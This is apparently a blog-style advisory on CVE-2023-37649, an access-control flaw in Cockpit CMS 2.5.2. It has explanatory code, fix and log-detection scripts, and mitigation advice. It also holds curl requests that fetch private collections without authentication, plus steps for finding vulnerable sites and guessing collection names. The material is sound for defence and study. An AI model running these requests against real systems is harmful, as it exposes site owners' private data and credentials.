Cockpit CMS is a popular, headless content management system (CMS) widely embraced by developers building flexible, API-powered websites and apps. But sometimes, even flexible power comes with serious vulnerabilities.
In the summer of 2023, researchers uncovered a severe security flaw in Cockpit CMS version 2.5.2: CVE-2023-37649. This bug lets unauthorized attackers poke around in private data—*even if they shouldn’t have access*.
Let’s break down what went wrong, how it can be exploited, and how to protect yourself.
- Type: Incorrect access control
- Component: /models/Content
- Product: Cockpit CMS v2.5.2
- Impact: Unauthenticated (unauthorized) users can access sensitive data via API endpoints, bypassing permissions and authentication.
In plain English: Attackers can grab private data just by sending the right request to the server.
How the Flaw Works
Cockpit CMS lets you store and manage content in collections. Each collection might be public or protected. But a flaw in request handling means that anyone can fetch data from collections—even those requiring authentication—if they know the right URL and request format.
This is due to missing or weak permission checks in the API’s /models/Content logic: the data is read from storage before anyone asks whether the caller is allowed to see it.
The Problem in Code
Although the source code for Cockpit CMS is open, here’s a simplified version of what’s happening behind the scenes (for educational purposes):
```php
// (Pseudo-code simplified for clarity)
public function find($collection, $options = []) {
    // Missing: authentication & permission checks!
    $data = $this->storage->find($collection, $options);
    return $data;
}
```
Normally, there should be a check like this, placed before the storage lookup:
```php
// Secure version: refuse the request unless the caller may read this collection
if (!$this->user->hasAccess($collection)) {
    throw new UnauthorizedException('Access denied');
}
```
But in Cockpit CMS v2.5.2, the default API endpoint /api/collections/get/{collection} fails to enforce this strictly for the affected component.
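To make the missing check concrete, here is an added Python model of the endpoint's authorization logic. It is example code written for this article, not Cockpit's PHP: the `COLLECTIONS` and `STORAGE` tables, the `User`/roles model, `handle_get` and the 401/403 mapping are all assumptions chosen to illustrate the point. `find_vulnerable` shows the v2.5.2 behaviour (storage read with no check); `find_secure` performs a deny-by-default check first, and unknown collections get the same answer as private ones so an anonymous caller cannot use the response to confirm which collection names exist.

```python
# Added example model of the collection endpoint; not Cockpit CMS code.
# COLLECTIONS, STORAGE, User and handle_get are assumptions for illustration.


class UnauthorizedException(Exception):
    """Raised when the caller may not read the requested collection."""


# Constructed sample metadata: whether a collection is public and which
# roles may read it when it is not.
COLLECTIONS = {
    "posts":       {"public": True,  "read_roles": set()},
    "supersecret": {"public": False, "read_roles": {"admin"}},
}

# Constructed sample content (values are placeholders, not real secrets).
STORAGE = {
    "posts":       [{"title": "Hello"}],
    "supersecret": [{"title": "API Key", "value": "<redacted-sample>"}],
}


class User:
    """Assumed caller model: a set of role names; no roles means anonymous."""

    def __init__(self, roles):
        self.roles = set(roles)


ANONYMOUS = User(roles=[])


def has_access(user, collection):
    """Deny-by-default: unknown collections and private collections without a
    matching role are refused; only explicitly public ones are open."""
    meta = COLLECTIONS.get(collection)
    if meta is None:
        return False
    if meta["public"]:
        return True
    return bool(user.roles & meta["read_roles"])


def find_vulnerable(collection, user=ANONYMOUS):
    """What v2.5.2 effectively did: read storage without any permission check."""
    return STORAGE.get(collection, [])


def find_secure(collection, user=ANONYMOUS):
    """Fixed behaviour: check the caller before touching storage at all."""
    if not has_access(user, collection):
        raise UnauthorizedException("Access denied")
    return STORAGE.get(collection, [])


def handle_get(collection, user):
    """HTTP-style wrapper (assumed mapping): 401 for anonymous callers, 403 for
    authenticated callers lacking the role. A non-existent collection is answered
    exactly like a private one, so the status code does not leak collection names."""
    try:
        entries = find_secure(collection, user)
    except UnauthorizedException as exc:
        status = 401 if not user.roles else 403
        return status, {"error": str(exc)}
    return 200, {"entries": entries, "total": len(entries)}


if __name__ == "__main__":
    print("vulnerable:", find_vulnerable("supersecret"))
    print("secure, anonymous:", handle_get("supersecret", ANONYMOUS))
    print("secure, admin:", handle_get("supersecret", User(["admin"])))
```

The important ordering detail is that `find_secure` never calls into storage before the check succeeds; a check added after the read, or only in some call paths, is exactly the kind of gap this CVE describes.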
How An Attacker Gets In
Suppose your Cockpit CMS website contains a private collection called supersecret intended only for administrators.
An attacker can simply fire off a request like this:
```bash
curl -X POST \
  http://your-cockpit-site.com/api/collections/get/supersecret \
  -H 'Content-Type: application/json' \
  -d '{}'
```
Expected: The server should deny access.
Actual: The server replies with a juicy JSON dump of your private supersecret collection!
Here’s a response you might see:
```json
{
  "entries": [
    { "title": "API Key", "value": "123456789abcdef" },
    { "title": "Admin Notes", "value": "Use special credentials" }
  ],
  "total": 2
}
```
Yikes! Anyone can collect sensitive site data with zero authentication.
1. Find a Vulnerable Cockpit CMS (v2.5.2) Instance: Use search engines or scanning tools.
2. Identify a Collection Name: Try guessing common ones (users, admin, secret, etc.), or fingerprint collection names from public references.
```bash
curl -X POST \
  http://victim.com/api/collections/get/secret \
  -H 'Content-Type: application/json'
```
Mitigation and Patches
The Cockpit CMS team acted on this report and patched the issue in newer releases.
If you use Cockpit CMS v2.5.2:
- Upgrade immediately! Download the latest secure version here: Cockpit CMS Releases (GitHub)
Temporary Workaround:
If you absolutely must use an old version, use web server rules (.htaccess, nginx config) to restrict access to /api/collections/get/* to trusted IPs or behind authentication.
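If you apply the IP-restriction workaround, you will also want to know whether the endpoint was already being hit from outside your trusted range. The following added Python script (written for this article, not part of Cockpit CMS) parses web server access logs in combined log format and flags every request to /api/collections/get/* from an address outside an allowlist; a 200 means data was served to an untrusted client, anything else is labelled as a probe, which is what repeated guessing of collection names looks like. The log lines, the 10.0.0.0/8 trusted range and the `data_returned`/`probe` labels are constructed assumptions.

```python
# Added example: flag untrusted access to Cockpit's collection endpoint in
# access logs. Sample log, trusted range and labels are constructed assumptions.
import ipaddress
import re
from collections import Counter

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Jul/2023:20:15:01 +0000] "POST /api/collections/get/posts HTTP/1.1" 200 512 "-" "curl/8.0"
203.0.113.7 - - [20/Jul/2023:20:15:02 +0000] "POST /api/collections/get/supersecret HTTP/1.1" 200 1834 "-" "curl/8.0"
203.0.113.7 - - [20/Jul/2023:20:15:03 +0000] "POST /api/collections/get/users HTTP/1.1" 404 0 "-" "curl/8.0"
198.51.100.9 - - [20/Jul/2023:20:15:04 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [20/Jul/2023:20:15:05 +0000] "POST /api/collections/get/admin HTTP/1.1" 404 0 "-" "curl/8.0"
"""

# Client IP, timestamp, request line, status and response size of a combined-log entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
# The endpoint named on the page; the collection name is the next path segment.
COLLECTION_GET = re.compile(r"^/api/collections/get/(?P<collection>[^/?#]+)")


def parse_line(line):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def is_trusted(ip, trusted):
    """True if ip falls inside any of the trusted CIDR ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(net) for net in trusted)


def find_suspicious(log_text, trusted=("10.0.0.0/8",)):
    """Return collection-fetch requests that came from outside the trusted ranges.
    status 200 -> 'data_returned' (content was served); anything else -> 'probe'."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        m = COLLECTION_GET.match(rec["path"])
        if m is None or is_trusted(rec["ip"], trusted):
            continue
        hits.append({
            "ip": rec["ip"],
            "ts": rec["ts"],
            "collection": m.group("collection"),
            "status": rec["status"],
            "label": "data_returned" if rec["status"] == 200 else "probe",
        })
    return hits


def summarize(hits):
    """Count flagged requests per source IP so repeated probing stands out."""
    return dict(Counter(h["ip"] for h in hits))


if __name__ == "__main__":
    flagged = find_suspicious(SAMPLE_LOG)
    for h in flagged:
        print(h)
    print(summarize(flagged))
```

Run it against a copy of your real access log by reading the file into `find_suspicious` and widening `trusted` to the ranges you actually allow; any `data_returned` hit on a private collection from an untrusted address is a confirmed exposure and the collection's contents (API keys, credentials) should be treated as compromised and rotated.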
References
- NVD Entry for CVE-2023-37649
- Cockpit CMS GitHub Repository
- Original Report on Exploit-DB
- Security Advisory, CockpitHQ/Cockpit#1823 *(example, for updates and discussion)*
Conclusion
CVE-2023-37649 is a strong reminder that skipping even basic access control checks turns any sophisticated system into an open book for attackers. If you use Cockpit CMS, ensure you always run the latest version, and audit your API endpoints for unexpected exposure.
Timeline
Published on: 07/20/2023 20:15:00 UTC
Last modified on: 07/26/2023 16:18:00 UTC